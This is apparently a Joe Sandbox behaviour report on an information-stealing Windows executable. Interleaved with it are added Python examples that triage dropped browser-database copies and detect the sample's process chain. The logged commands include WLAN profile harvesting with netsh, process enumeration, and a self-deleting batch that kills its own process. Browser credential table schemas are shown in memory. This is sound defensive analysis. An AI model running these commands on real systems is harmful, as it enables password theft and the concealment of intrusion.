      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4316:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2476:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:304:WilStaging_02
      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4236
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | File created: C:\Users\user\AppData\Local\Temp\34kwy3cf.3l5
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat
      Source: 3K5MXGVOJE.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
      Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 4236)
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | File read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D10000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E57000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003D67000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1072336540.00000000078B5000.00000004.00000020.00020000.00000000.sdmp, tmpF572.tmp.dat.0.dr, tmpF571.tmp.dat.0.dr, tmpF56F.tmp.dat.0.dr | Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1061396393.0000000002D54000.00000004.00000800.00020000.00000000.sdmp, tmpF570.tmp.dat.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003E97000.00000004.00000800.00020000.00000000.sdmp, 3K5MXGVOJE.exe, 00000000.00000002.1064806844.0000000003EB5000.00000004.00000800.00020000.00000000.sdmp, tmpF54B.tmp.dat.0.dr, tmpF54C.tmp.dat.0.dr, tmpF54D.tmp.dat.0.dr | Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
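The three CREATE TABLE strings above are schema fragments of Chromium-family browser profile databases: password_notes (which references logins) belongs to the Login Data database, while benefit_merchant_domains and the Edge-specific autofill_profile_edge_extended come from Web Data. Finding them both in process memory and in the tmpF5xx.tmp.dat files the sample dropped is consistent with the stealer copying locked browser databases to %TEMP% before reading them. The Python below is an added triage example, not part of this Joe Sandbox report or of the sample: it classifies such drops by the tables they contain. It builds stand-in files from the statements quoted above (the logins table definition is a minimal assumption, not Chromium's real schema, and the decoy file's content is constructed), checks the SQLite magic before opening anything, and opens each file read-only and immutable so the triage leaves no journal or WAL side files next to evidence.

```python
"""Schema-based triage of files dropped by the stealer, classifying each by the
Chromium-family profile database its tables belong to. Added example: the
CREATE TABLE strings are the ones quoted in the report; the 'logins' table
definition is a minimal stand-in, not Chromium's real one."""
import os
import sqlite3
import tempfile
from pathlib import Path

SQLITE_MAGIC = b"SQLite format 3\x00"

# Table names that tie a file to a specific browser profile database.
FINGERPRINTS = {
    "Login Data": {"logins", "password_notes"},
    "Web Data": {"benefit_merchant_domains", "autofill_profile_edge_extended"},
}

# Constructed stand-ins for the dropped tmpF5xx.tmp.dat files seen in the report.
SAMPLE_SCHEMAS = {
    "tmpF570.tmp.dat": [
        "CREATE TABLE logins (id INTEGER PRIMARY KEY AUTOINCREMENT, origin_url VARCHAR NOT NULL, "
        "username_value VARCHAR, password_value BLOB)",  # assumed minimal shape
        "CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL "
        "REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, "
        "key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, "
        "UNIQUE (parent_id, key))",
    ],
    "tmpF572.tmp.dat": [
        "CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)",
    ],
    "tmpF54B.tmp.dat": [
        'CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, '
        "date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, "
        "source_id VARCHAR)",
    ],
}


def is_sqlite(path):
    """Cheap header check so arbitrary temp files are never handed to the SQLite engine."""
    with open(path, "rb") as fh:
        return fh.read(len(SQLITE_MAGIC)) == SQLITE_MAGIC


def table_names(path):
    # Read-only and immutable: no -journal/-wal side files are created next to the evidence.
    uri = Path(path).resolve().as_uri() + "?mode=ro&immutable=1"
    con = sqlite3.connect(uri, uri=True)
    try:
        rows = con.execute("SELECT name FROM sqlite_master WHERE type = 'table'")
        return {row[0] for row in rows}
    finally:
        con.close()


def classify(path):
    """Map a file to the browser database it was copied from, by table-name fingerprint."""
    if not is_sqlite(path):
        return "not sqlite"
    tables = table_names(path)
    for label, markers in FINGERPRINTS.items():
        if tables & markers:
            return label
    return "sqlite (unrecognised schema)"


def build_samples(directory):
    """Write the constructed stand-ins into `directory`, plus a non-SQLite decoy."""
    paths = {}
    for name, ddl in SAMPLE_SCHEMAS.items():
        path = os.path.join(directory, name)
        con = sqlite3.connect(path)
        for stmt in ddl:
            con.execute(stmt)
        con.commit()
        con.close()
        paths[name] = path
    decoy = os.path.join(directory, "34kwy3cf.3l5")  # name from the report, content constructed
    with open(decoy, "wb") as fh:
        fh.write(b"not a database")
    paths["34kwy3cf.3l5"] = decoy
    return paths


def triage(directory=None):
    """Classify every constructed drop; uses a throwaway directory when none is given."""
    if directory is None:
        with tempfile.TemporaryDirectory() as tmp:
            return triage(tmp)
    return {name: classify(path) for name, path in build_samples(directory).items()}


if __name__ == "__main__":
    for name, label in triage().items():
        print(f"{name}: {label}")
```

In a real case, point classify() at the files recovered from the user's %TEMP% (or at the .dr artifacts exported from the sandbox) instead of the constructed ones; the fingerprint table is the only part that needs extending when other browsers' schemas turn up.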
      Source: 3K5MXGVOJE.exe | ReversingLabs: Detection: 50%
      Source: unknown | Process created: C:\Users\user\Desktop\3K5MXGVOJE.exe "C:\Users\user\Desktop\3K5MXGVOJE.exe"
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4236
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 3212
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4236
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
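The process tree above (tasklist launched through cmd, "chcp 65001 && netsh wlan show profiles | findstr All" for WLAN profile enumeration, and a "cmd /C <tmp>.bat & Del <tmp>.bat" self-delete whose batch runs TaskKill and Timeout) is the part of this report that translates most directly into endpoint detection. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it runs three rules over constructed Sysmon-style process-creation events modelled on these rows. The field names, and every PID other than 4236, are assumptions. Each rule walks past cmd.exe and conhost.exe to the process that actually launched the chain, so the same netsh command typed by an administrator in an Explorer-spawned console is not flagged; the self-delete rule requires the identical .bat path on both sides of the "&".

```python
"""Detection logic for the process chain in this report, run over constructed
Sysmon-style process-creation events (Event ID 1 fields ProcessId,
ParentProcessId, Image, CommandLine). Field names, and every PID except 4236,
are assumptions made for this example."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample: the stealer's chain as listed in the report, plus a benign
# administrator running the same netsh command from an Explorer-launched cmd.
SAMPLE_EVENTS = [
    ProcEvent(4236, 1000, r"C:\Users\user\Desktop\3K5MXGVOJE.exe",
              r'"C:\Users\user\Desktop\3K5MXGVOJE.exe"'),
    ProcEvent(5001, 4236, r"C:\Windows\SysWOW64\cmd.exe", '"cmd.exe" /c tasklist'),
    ProcEvent(5002, 5001, r"C:\Windows\SysWOW64\tasklist.exe", "tasklist"),
    ProcEvent(5003, 4236, r"C:\Windows\SysWOW64\cmd.exe",
              '"cmd" /C chcp 65001 && netsh wlan show profiles | findstr All'),
    ProcEvent(5004, 5003, r"C:\Windows\SysWOW64\chcp.com", "chcp 65001"),
    ProcEvent(5005, 5003, r"C:\Windows\SysWOW64\netsh.exe", "netsh wlan show profiles"),
    ProcEvent(5006, 5003, r"C:\Windows\SysWOW64\findstr.exe", "findstr All"),
    ProcEvent(5007, 4236, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat'
              r' & Del C:\Users\user\AppData\Local\Temp\tmp3937.tmp.bat'),
    ProcEvent(5008, 5007, r"C:\Windows\SysWOW64\taskkill.exe", "TaskKill /F /IM 4236"),
    ProcEvent(5009, 5007, r"C:\Windows\SysWOW64\timeout.exe", "Timeout /T 2 /Nobreak"),
    ProcEvent(6000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(6001, 6000, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe"'),
    ProcEvent(6002, 6001, r"C:\Windows\System32\netsh.exe", "netsh wlan show profiles"),
]

TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SHELLS = {"cmd.exe", "conhost.exe"}
# cmd /C <file>.bat & Del <same file>.bat : the self-delete idiom recorded in the report.
SELF_DELETE = re.compile(r"/c\s+(?P<bat>\S+\.bat)\s*&\s*del\s+(?P=bat)(?:\s|$)", re.IGNORECASE)


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def launcher_of(ev, index):
    """Walk up through cmd.exe/conhost.exe to the process that really started the chain."""
    cur = ev
    while True:
        parent = index.get(cur.ppid)
        if parent is None:
            return cur
        if basename(parent.image) not in SHELLS:
            return parent
        cur = parent


def is_trusted(image):
    return image.lower().startswith(TRUSTED_DIRS)


def detect(events):
    """Return {finding: [pid, ...]} for the three behaviours this report records."""
    index = {e.pid: e for e in events}
    findings = {"wlan_profile_harvest": [], "tasklist_enum": [], "self_delete_batch": []}
    for ev in events:
        name = basename(ev.image)
        cl = ev.cmdline.lower()
        untrusted = not is_trusted(launcher_of(ev, index).image)
        if name == "netsh.exe" and all(k in cl for k in ("wlan", "show", "profile")) and untrusted:
            findings["wlan_profile_harvest"].append(ev.pid)
        elif name == "tasklist.exe" and untrusted:
            findings["tasklist_enum"].append(ev.pid)
        elif name == "cmd.exe" and SELF_DELETE.search(ev.cmdline):
            findings["self_delete_batch"].append(ev.pid)
    return findings


if __name__ == "__main__":
    for finding, pids in detect(SAMPLE_EVENTS).items():
        print(f"{finding}: {pids}")
```

The launcher check is what keeps the netsh rule usable: "netsh wlan show profiles" on its own is routine administration, and what makes it the "Capture Wi-Fi password" behaviour from the Signatures list is the untrusted parent one hop above cmd.exe. Feed the same rules EDR or Sysmon data by mapping its parent/child fields onto ProcEvent.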
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: mscoree.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: version.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: edgegdi.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: napinsp.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: pnrpnsp.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: wshbth.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: nlaapi.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: winrnr.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: wbemcomn.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: amsi.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: dwrite.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: windowscodecs.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: rasapi32.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: rasman.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: rtutils.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: edputil.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: appresolver.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: bcp47langs.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: slc.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: sppc.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\Desktop\3K5MXGVOJE.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: edgegdi.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\chcp.com | Section loaded: ulib.dll
      Source: C:\Windows\SysWOW64\chcp.com | Section loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: edgegdi.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
      Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\findstr.exe | Section loaded: edgegdi.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
      Source: C:\Windows\SysWOW64\chcp.com | Section loaded: ulib.dll
      Source: C:\Windows\SysWOW64\chcp.com | Section loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: edgegdi.dll
      Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: winsta.dll
      Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\taskkill.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: edgegdi.dll
